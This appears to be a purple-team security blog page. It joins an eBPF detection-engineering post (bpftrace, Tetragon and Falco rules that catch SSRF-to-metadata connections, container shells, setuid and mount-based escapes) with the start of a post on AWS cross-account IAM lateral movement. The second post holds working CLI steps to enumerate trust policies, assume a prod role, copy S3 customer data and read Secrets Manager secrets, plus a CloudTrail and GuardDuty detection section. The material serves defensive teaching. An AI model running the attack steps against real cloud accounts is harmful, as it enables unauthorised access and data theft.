For operators not writing eBPF: This table tells you what your current SIEM can and cannot see. If your threat model includes container escapes, SSRF-to-metadata attacks, or post-compromise lateral movement through process execution, the detection signal for those techniques does not exist in your CloudTrail or your flow logs. It exists only at the kernel level.

Detection Rule 1: Unexpected Outbound from an Application Container

The SSRF attack in EP07 — and the lateral movement in EP10 — both required an outbound TCP connection from a process that had no legitimate reason to make one. This is the detection.

Ad-hoc investigation with bpftrace

When you’re on a node right now and need to know what’s connecting outbound:

# Shows PID, process name, and destination IP in real time
# Run on the node (requires root or CAP_BPF)
bpftrace -e '
#include <linux/socket.h>
#include <linux/in.h>

tracepoint:syscalls:sys_enter_connect {
  $sa = (struct sockaddr_in *)args->uservaddr;
  if ($sa->sin_family == AF_INET) {
    printf("connect: pid=%-6d comm=%-20s dst=%s:%d\n",
           pid,
           comm,
           ntop($sa->sin_addr.s_addr),
           (uint16)bswap($sa->sin_port));
  }
}
'

Sample output — what you’d see during an SSRF exploit targeting the EC2 metadata service:

connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18422  comm=python3              dst=169.254.169.254:80
connect: pid=18432  comm=curl                 dst=169.254.169.254:80

The python3 process — your web application — connecting to 169.254.169.254 is the metadata endpoint. That’s not a legitimate application dependency. That’s the SSRF signal.

bpftrace — kernel answers in one line goes deep on the tracepoint/kprobe model and how to filter by cgroup for container-specific traces. The one-liners above are the starting point; that post covers building targeted investigation scripts.

Production-grade enforcement with Tetragon

bpftrace is for investigation. Tetragon is for always-on detection — and optionally, prevention.

# TracingPolicy: alert on outbound connections from non-host network namespaces
# (any container making outbound TCP connections)
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-outbound-connections"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchNamespaces:
      - namespace: Net
        operator: NotIn
        values:
        - "host"
      matchActions:
      - action: Post   # Generate an alert event; change to Sigkill to prevent

To detect specifically the SSRF-to-metadata pattern — connections to 169.254.169.254:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-imds-access"
spec:
  kprobes:
  - call: "tcp_connect"
    syscall: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "169.254.169.254/32"
      matchActions:
      - action: Post
        rateLimit: "1/minute"

Tetragon events include process_kprobe JSON with the pod name, namespace, container ID, binary path, parent binary, and all arguments. This feeds directly into your SIEM or to Hubble’s flow log.

Detection Rule 2: Process Execution Inside a Container

A shell spawning inside a container that has no business running a shell is a post-compromise indicator. It covers the container escape setup from EP08, the supply chain implant from EP09, and any hands-on-keyboard phase after initial access.

Falco rule: shell spawned from application container

# Falco rule: detect any shell spawned in a container
# Add to /etc/falco/rules.d/purple-team.yaml
- list: shell_binaries
  items: [bash, sh, zsh, ksh, fish, tcsh, csh, dash]

- list: allowed_shell_images
  items: [
    "debug-tools",     # Your approved debug container image names
    "toolbox"
  ]

- rule: Shell Spawned in Container
  desc: >
    A shell was spawned inside a container. In application containers (web servers,
    APIs, data processors) this is almost always a post-compromise indicator.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    container.image.repository != "" and
    proc.name in (shell_binaries) and
    not proc.pname in (shell_binaries) and
    not container.image.repository in (allowed_shell_images) and
    not k8s.ns.name in (kube-system, kube-public)
  output: >
    Shell spawned in container
    (user=%user.name
     container=%container.name
     image=%container.image.repository
     cmd=%proc.cmdline
     parent=%proc.pname
     pod=%k8s.pod.name
     ns=%k8s.ns.name)
  priority: WARNING
  tags: [purple-team, post-compromise, container]

The proc.pname condition is the key signal: a shell spawned by a web server process (nginx, node, gunicorn, java) is a different threat than a shell spawned by another shell in a debug context. The rule above passes the second case through the allowed_shell_images exclusion; it flags the first.

Detecting the supply chain implant pattern

EP09 covered supply chain attacks where a build artifact executes unexpected binaries at runtime. The bpftrace version for ad-hoc investigation of what a specific container is executing:

# bpftrace: trace all execve() calls from processes inside a specific container
# First, find the container's cgroup ID:
# systemd-cgls | grep <pod-name>
# Or: cat /sys/fs/cgroup/unified/<cgroup-path>/cgroup.procs

bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  printf("execve: pid=%-6d ppid=%-6d comm=%-20s file=%s\n",
         pid,
         curtask->real_parent->tgid,
         comm,
         str(args->filename));
}
' 2>/dev/null | grep -v "^\[" | head -50

Sample output during a supply chain compromise scenario — unexpected binary execution from a package manager implant:

execve: pid=31204  ppid=31190  comm=node                 file=/bin/sh
execve: pid=31205  ppid=31204  comm=sh                   file=/tmp/.x/beacon
execve: pid=31206  ppid=31205  comm=beacon               file=/usr/bin/curl

The chain node → sh → /tmp/.x/beacon → curl — application process spawning a shell, which executes an unknown binary from /tmp, which runs curl — is the supply chain implant execution pattern. None of this appears in CloudTrail.

Detection Rule 3: Privilege Escalation — setuid(0) and Capability Abuse

A process calling setuid(0) to elevate to root, or setcap to acquire new capabilities, is a privilege escalation indicator. The EP08 container escape path used a setuid binary to gain root inside the container as the first step toward escaping the namespace.

bpftrace: catch setuid(0) calls in real time

# bpftrace: alert on any process calling setuid(0)
# Any process attempting to switch to UID 0
bpftrace -e '
tracepoint:syscalls:sys_enter_setuid {
  if (args->uid == 0) {
    printf("ALERT setuid(0): pid=%-6d comm=%-20s ppid=%d pcomm=%s\n",
           pid,
           comm,
           curtask->real_parent->tgid,
           str(curtask->real_parent->comm));
  }
}
tracepoint:syscalls:sys_enter_setresuid {
  if (args->ruid == 0 || args->euid == 0) {
    printf("ALERT setresuid(root): pid=%-6d comm=%-20s\n", pid, comm);
  }
}
'

Falco rule: setuid binary execution inside container

- rule: Setuid Binary Executed in Container
  desc: >
    A setuid binary was executed inside a container. Setuid binaries inside
    containers are a privilege escalation path — they run as root regardless
    of the container's user setting.
  condition: >
    evt.type = execve and
    evt.dir = < and
    container and
    proc.is_suid_exe = true
  output: >
    Setuid binary executed in container
    (binary=%proc.exepath
     user=%user.name
     container=%container.name
     pod=%k8s.pod.name
     cmd=%proc.cmdline)
  priority: ERROR
  tags: [purple-team, privilege-escalation, container]

Detection Rule 4: Container Escape Attempt via Namespace-Crossing Mount

The privileged container escape path from EP08 requires calling mount() from a container namespace to access the host filesystem. The kernel records the mount namespace of the calling process — an eBPF kprobe on mount() can detect when the caller’s mount namespace differs from the host namespace.

Tetragon policy: kill any mount from a non-host namespace

# This covers the --privileged container escape path documented in EP08
# The mount() call that crosses from container namespace to host filesystem
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-container-mount-escape"
spec:
  kprobes:
  - call: "security_sb_mount"
    syscall: false
    args:
    - index: 0
      type: "string"     # dev_name
    - index: 3
      type: "string"     # mount flags
    selectors:
    - matchNamespaces:
      - namespace: Mnt
        operator: NotIn
        values:
        - "host"
      matchArgs:
      - index: 0
        operator: "NotEqual"
        values:
        - "proc"
        - "sysfs"
        - "tmpfs"        # Common legitimate mounts in containers
      matchActions:
      - action: Sigkill
        rateLimit: "10/minute"

Start with action: Post and tune the exclusions for your environment before switching to Sigkill. See the production gotchas below.

bpftrace: ad-hoc namespace crossing investigation

# bpftrace: trace mount() calls and show the mount namespace of the caller
# Mount namespace ID of the host: read from /proc/1/ns/mnt
HOST_MNT_NS=$(readlink /proc/1/ns/mnt | grep -oP '\d+')

bpftrace -e '
#include <linux/nsproxy.h>
#include <linux/mount.h>

kprobe:__x64_sys_mount {
  $nsproxy = (struct nsproxy *)curtask->nsproxy;
  $mnt_ns_id = $nsproxy->mnt_ns->ns.inum;
  printf("mount: pid=%-6d comm=%-20s mnt_ns=%u\n",
         pid, comm, $mnt_ns_id);
}
' 2>/dev/null

Compare the mnt_ns value in output against $HOST_MNT_NS. Any mount call with a mnt_ns value other than the host’s is from inside a container. A privileged container attempting host filesystem access shows a container namespace ID.

Building a Detection Pipeline

Ad-hoc bpftrace commands answer questions during an incident. Always-on detection requires a pipeline that runs continuously, routes alerts to a durable destination, and survives pod restarts. The two production-grade options in this stack:

eBPF hooks
    │
    ├── Tetragon (always-on, Kubernetes-native)
    │       └── TracingPolicy CRDs
    │               └── JSON events → Hubble → Grafana
    │                               → SIEM (Splunk/Elastic)
    │                               → PagerDuty
    │
    └── Falco (rule-based, declarative)
            └── /etc/falco/rules.d/*.yaml
                    └── falcosidekick
                            ├── Slack
                            ├── PagerDuty
                            ├── Elasticsearch
                            └── AWS Lambda (custom response)

The TC eBPF pod-level network policy post covers how Cilium and Tetragon share the same underlying kernel attachment points — understanding TC hooks helps explain why Tetragon’s network-level policies fire at the same layer as Cilium’s NetworkPolicy enforcement.

Falco with falcosidekick: complete local testing setup

Use this to validate your Falco rules before deploying to a cluster. It routes Falco alerts to Slack in real time.

# docker-compose.yml — local Falco + falcosidekick testing
# Requires: Docker with kernel headers or eBPF driver support
version: "3.8"

services:
  falco:
    image: falcosecurity/falco-no-driver:latest
    privileged: true
    volumes:
      - /var/run/docker.sock:/host/var/run/docker.sock
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
      - /etc/falco:/etc/falco
      - ./rules:/etc/falco/rules.d:ro
    environment:
      FALCO_GRPC_ENABLED: "true"
      FALCO_GRPC_BIND_ADDRESS: "0.0.0.0:5060"
    ports:
      - "5060:5060"
    command: >
      /usr/bin/falco
        --modern-bpf
        -o "json_output=true"
        -o "grpc.enabled=true"
        -o "grpc_output.enabled=true"

  falcosidekick:
    image: falcosecurity/falcosidekick:latest
    depends_on:
      - falco
    environment:
      FALCO_GRPC_CONN: "falco:5060"
      FALCO_GRPC_TLS: "false"
      SLACK_WEBHOOKURL: "${SLACK_WEBHOOK}"
      SLACK_MINIMUMPRIORITY: "warning"
      SLACK_MESSAGEFORMAT: >
        "[{{.Priority}}] {{.Rule}}
        | pod={{.OutputFields.k8s_pod_name}}
        | ns={{.OutputFields.k8s_ns_name}}
        | cmd={{.OutputFields.proc_cmdline}}"
    ports:
      - "2801:2801"

# Start the stack (set SLACK_WEBHOOK first)
export SLACK_WEBHOOK="https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
docker compose up -d

# Trigger a test alert: exec into any running container
docker exec -it <any-container> /bin/sh

# Check falcosidekick received it
curl -s http://localhost:2801/metrics | grep falcosidekick_inputs_total

Deploying Falco to Kubernetes with Helm

# Add Falco Helm repo
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

# Install Falco with eBPF driver (not kernel module — required in Kubernetes)
helm install falco falcosecurity/falco \
  --namespace falco \
  --create-namespace \
  --set driver.kind=modern_ebpf \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.slack.minimumpriority=warning \
  --set customRules."purple-team\.yaml"="$(cat ./rules/purple-team.yaml)"

# Verify Falco pods are running on all nodes
kubectl get pods -n falco -o wide

# Tail Falco logs for a specific node's pod
kubectl logs -n falco -l app.kubernetes.io/name=falco -f

# Validate a specific rule is loaded
kubectl exec -n falco <falco-pod> -- falco --list-rules 2>/dev/null | grep "Shell Spawned"

What This Means for Each Prior Attack

Every attack in EP07 through EP10 had a detectable kernel-level signal that the standard telemetry stack missed. Here’s the detection mapping:

Episode	Attack	What Standard Telemetry Missed	eBPF Detection Signal
EP07	SSRF to EC2 IMDS	CloudTrail: nothing. VPC Flow Logs: 169.254.169.254 destination, 15-min delay, no PID	TC kprobe: `connect()` to `169.254.169.254` from app process — PID, comm, container, real-time
EP08	Container escape via privileged mount	CloudTrail: nothing. Syslog: nothing	kprobe: `security_sb_mount()` from non-host mount namespace — namespace ID mismatch fires alert
EP09	Supply chain implant execution	CloudTrail: nothing (OS-level). GuardDuty: maybe if beacon calls AWS APIs	kprobe: `execve()` with anomalous parent chain — web process → shell → unknown binary from `/tmp`
EP10	Lateral movement via cross-account role chaining	CloudTrail: AssumeRole events present but no process context	TC hook: `connect()` to `sts.amazonaws.com` from Lambda handler process — unexpected process identity

The table is not theoretical. It reflects what you would actually observe running these detection rules against the attack simulations in those episodes.

For the SSRF case (EP07): the connection to 169.254.169.254 from the web application process would fire within milliseconds of the exploit. VPC Flow Logs would record the same IP 10–15 minutes later, with no information about which process made it. By the time the flow log is queryable, the attacker has the IAM credentials and may have made subsequent API calls in a different region.

For the container escape (EP08): the mount() from a non-host mount namespace is the earliest detectable signal of the escape attempt. It fires before the attacker has host filesystem access. With action: Sigkill in the Tetragon policy, the process is terminated at this syscall — the escape does not complete.

⚠ Production Gotchas

Use the eBPF driver for Falco in Kubernetes, not the kernel module. The kernel module requires installing a kernel module on every node, which creates a dependency on kernel headers being present and compatible. The modern_ebpf driver (Falco 0.35+) uses BTF and CO-RE — it works on kernels 5.8+ without kernel module installation and survives kernel upgrades. In managed Kubernetes (EKS, GKE, AKS), the kernel module path often doesn’t work at all due to the OS image restrictions.

Test Tetragon’s Sigkill action exhaustively before enabling it in production. The Sigkill action terminates the process at the moment of the violating syscall — before it completes. This is powerful for prevention but catastrophic if your exclusions are wrong. Common false positive sources: debug containers (kubectl debug), init containers that perform legitimate mounts, Kubernetes admission webhooks calling shell scripts. Always deploy with action: Post first, tune for two weeks of normal traffic, then switch to Sigkill only on rules with zero false positives in your environment.

bpftrace is an investigation tool, not a production detector. bpftrace compiles and loads an eBPF program per invocation — it has no persistence, no alerting, and no output routing to your SIEM. It is for the incident response scenario described in the opening: “did this process make outbound connections in the last 30 minutes?” (answered: it’s what’s happening right now). For always-on detection, use Tetragon or Falco. Running bpftrace as a daemon substitute introduces overhead without the management plane that production tools provide.

The shell-in-container rule will fire on kubectl exec sessions. Any time an operator runs kubectl exec -it <pod> -- /bin/bash, the Falco rule above triggers. This is working as intended — kubectl exec is a post-compromise technique as well as an operational tool. Handle this with an exclusion on the user identity or namespace:

# Add to the rule condition to exclude operator kubectl exec sessions
# Map your cluster admin users or service account here
and not user.name in (cluster-admin-users)
and not k8s.ns.name in (ops-tooling, debug-ns)

High-frequency kprobes on hot paths add measurable overhead. Attaching to tcp_connect fires on every outbound connection from every process on the node. On a node handling hundreds of microservices with high connection rates (service mesh with short-lived connections), this adds CPU overhead. Profile before deploying. Tetragon’s namespace-scoped selectors (matchNamespaces: NotHost) help by skipping host-namespace processes. Filter as narrowly as your threat model allows.

Ring buffer overflow silently drops events on high-throughput nodes. Both Falco and bpftrace use kernel ring buffers to pass events to userspace. If the userspace consumer (the Falco daemon, the bpftrace process) cannot keep up with the event rate, the kernel drops events silently. Falco exposes a falco_events_dropped_total metric — monitor it. Tune ring_buffer_size in the Falco configuration if drops occur on high-throughput nodes.

Quick Reference

Use Case	Tool	Hook Type	Detection Latency
Ad-hoc outbound connection investigation	bpftrace	tracepoint:syscalls:sys_enter_connect	Real-time
Always-on container shell detection	Falco	eBPF modern driver / syscall	< 100ms
Container escape prevention	Tetragon + Sigkill	kprobe: security_sb_mount	Blocking (pre-completion)
Privilege escalation detection	Falco / bpftrace	tracepoint:syscalls:sys_enter_setuid	Real-time
Supply chain implant execution	Falco execve rule	eBPF modern driver	< 100ms
SSRF-to-metadata detection	Tetragon kprobe	kprobe: tcp_connect	Real-time
Lateral movement via unexpected STS call	Tetragon kprobe	kprobe: tcp_connect + process filter	Real-time
Audit trail for incident response	Tetragon JSON events	kprobe / tracepoint	Persistent, SIEM-routable

Tool	Best For	Not For
bpftrace	Ad-hoc node investigation during IR	Always-on production detection
Falco	Rule-based behavioral detection	Network-layer enforcement
Tetragon	Always-on detection + optional enforcement	Ad-hoc one-liner investigation

Key Takeaways

Detection engineering with eBPF closes the telemetry gap that CloudTrail, VPC Flow Logs, and syslog cannot close: OS-level process activity is only visible at the kernel syscall layer, and eBPF is the only production-grade mechanism that reads it without kernel module risk
Every attack in EP07 through EP10 has a real-time kernel-level signal — SSRF connections, container mount calls, unexpected execve chains, privilege escalation attempts — none of which appear in your current SIEM unless you’ve built this layer
Falco provides declarative, rule-based behavioral detection; Tetragon provides syscall-level enforcement that can terminate an attack before it completes — use both with complementary scopes
bpftrace is the incident response tool for asking the kernel a direct question right now; it is not a monitoring agent and should not be treated as one
The false positive problem is real and must be addressed before enabling enforcement: kubectl exec, debug containers, init containers with legitimate mounts — exclusions must be tuned per environment before moving from action: Post to action: Sigkill

What’s Next

EP11 closed the detection gap. You’ve instrumented the kernel, you’re receiving Falco alerts, Tetragon is firing on namespace-crossing mount attempts. Then the alert fires at 2:47 AM on a Sunday — not a test, not a false positive. Something got in.

EP12 is the playbook for the first 24 hours after a confirmed cloud breach: what to isolate and how without destroying forensic evidence, what to preserve before it rotates out of CloudTrail’s 90-day window, what eBPF data to capture while the node is still live, who to call and in what order, and how to avoid the common mistakes that turn a containable incident into a regulatory event. The response phase — where everything you built in EP04 through EP11 either pays off or reveals what you missed.

Get EP12 in your inbox when it publishes → subscribe at linuxcent.com

Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What is purple team security? → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attacks → Cloud Lateral Movement

TL;DR

Cloud lateral movement IAM is OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships — no network pivoting, no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly — arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN — which lets any identity in the dev account assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty surfaces the pattern as Recon:IAMUser/UserPermissions
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control — cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, give any identity in the source account the ability to pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

Cloud lateral movement IAM attacks succeed because the authentication step — the sts:AssumeRole call — works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles that have cross-account trust relationships
# Look for principal ARNs from a different account ID
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] | 
    .AssumeRolePolicyDocument.Statement[] |
    select(.Principal.AWS? | 
      strings | 
      test($own_account) | not
    ) |
    {role: .Resource // "check-parent", principal: .Principal}'

# Simulate whether the current identity can assume a specific cross-account role
# This confirms the trust policy actually allows the assumption before trying it
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T14:32:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

# Exfiltrate — this is a single API call, logged in CloudTrail
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Check what other roles trust this prod role, or what this role can assume
aws iam list-roles --output json | \
  jq '.Roles[] | 
    select(.AssumeRolePolicyDocument.Statement[].Principal.AWS? | 
      strings | 
      test("datalake-reader")
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues — each hop gets a fresh 1-hour session
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The assume-role command enumerates all roles the current identity can assume, including cross-account.

# CloudFox: find all roles assumable from current identity
cloudfox aws -p target-profile assume-role -v2

# CloudFox: find all cross-account trust relationships
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    select(
      .requestParameters.roleArn != null and
      (.userIdentity.accountId != null) and
      (.requestParameters.roleArn | test(.userIdentity.accountId) | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: .userIdentity.accountId,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.

A fresh compromise indicator: userAgent showing aws-cli for a role that normally only calls AWS APIs from Lambda runtime (which uses the Python SDK and shows a different user agent). Lambda functions don’t call the CLI — if you see aws-cli user agent on a Lambda role, that’s a human or automated tool using stolen credentials.

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  requestparameters['roleArn'] AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: session created quickly after identity first seen (fresh compromise)
  CASE
    WHEN DATEDIFF(
      'minute',
      CAST(eventtime AS timestamp),
      CURRENT_TIMESTAMP
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS session_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: source account ID not in the target role ARN
  AND useridentity.accountid NOT IN (
    SELECT DISTINCT
      REGEXP_EXTRACT(requestparameters['roleArn'], 'arn:aws:iam::(\d+):', 1)
    FROM cloudtrail_logs
    WHERE eventname = 'AssumeRole'
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Recon:IAMUser/UserPermissions`	Identity enumerating IAM roles, policies, or permissions — consistent with Step 1
`PrivilegeEscalation:IAMUser/AdministrativePermissions`	API calls attempting to gain admin access
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/ObjectRead.Unusual`	S3 read volume spike — fires after the exfiltration in Step 3

# Pull active GuardDuty findings scoped to IAM lateral movement indicators
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Recon:IAMUser/UserPermissions",
          "PrivilegeEscalation:IAMUser/AdministrativePermissions",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/ObjectRead.Unusual"
        ]
      },
      "severity": {
        "GreaterThanOrEqualTo": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
